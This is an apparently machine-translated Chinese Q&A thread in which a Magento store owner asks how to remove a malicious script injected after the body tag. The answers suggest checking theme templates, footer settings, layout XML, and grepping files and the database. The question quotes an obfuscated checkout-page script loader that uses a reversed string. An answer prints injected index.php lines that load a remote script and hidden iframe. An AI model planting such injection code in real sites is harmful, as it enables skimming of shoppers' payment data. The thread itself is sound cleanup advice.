我有一个恶意脚本,它已经插入正文标签之后,我不知道要检查哪个文件以将其删除,我已经在管理员和模板中的任何地方进行了检查文件,它不在哪里找到。病毒看起来像这样:
if((new
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
答案 0 :(得分:0)
请尝试以下方法
我建议使用以下方法删除Magento中的第三方脚本:
<强>&GT;方法1. 请转到您的主题 app / design / frontend / Yourtheme / default / template / page / ,打开以下文件并查找此代码和评论,清除缓存后检查你的商店。
<?php echo $this->getAbsoluteFooter() ?>
1column.phtml
2columns-left.phtml
2columns-right.phtml
3columns.phtml
所有其他代码都在getAbsoluteFooter()函数下,
<强>&GT;方法2: GO管理面板常规&gt;设计&gt;页脚&gt;杂项HTML
<强>&GT;方法3:转到local.xml / page.xml文件并检查以下代码,可能会添加到同一个文件中
<block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
<label>Page Top</label>
希望它对你有所帮助。
答案 1 :(得分:0)
只要您知道脚本的名称是什么,就可以轻松摆脱这些恶意脚本。
我将很多这些脚本注入到我的网站中,其中大部分都是指向域http://siteverification.online的脚本和iframe。
我不是Magento专家,但我认为那时只能来自2个地方:
对于数据库,我使用的是MySQL,因为我安装了PhpMyAdmin,所以我利用了搜索功能,可以搜索所有表格的所有字段。数据库。我刚刚搜索了siteverification.online并找到了一些条目,并删除了它们。
对于文件系统,我通过SSH登录,只搜索整个magento网站文件系统,如下所示:
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
在我的例子中,事实证明在index.php中注入了一些PHP代码。但是如果代码是在任何其他php或html文件中注入的,那么它也会找到它们,因为搜索是递归的(-r标志)。
那就是它。我甚至不了解Magento的文件系统和数据库结构,但使用这些激进的搜索方法,我在几分钟内就摆脱了所有的恶意软件。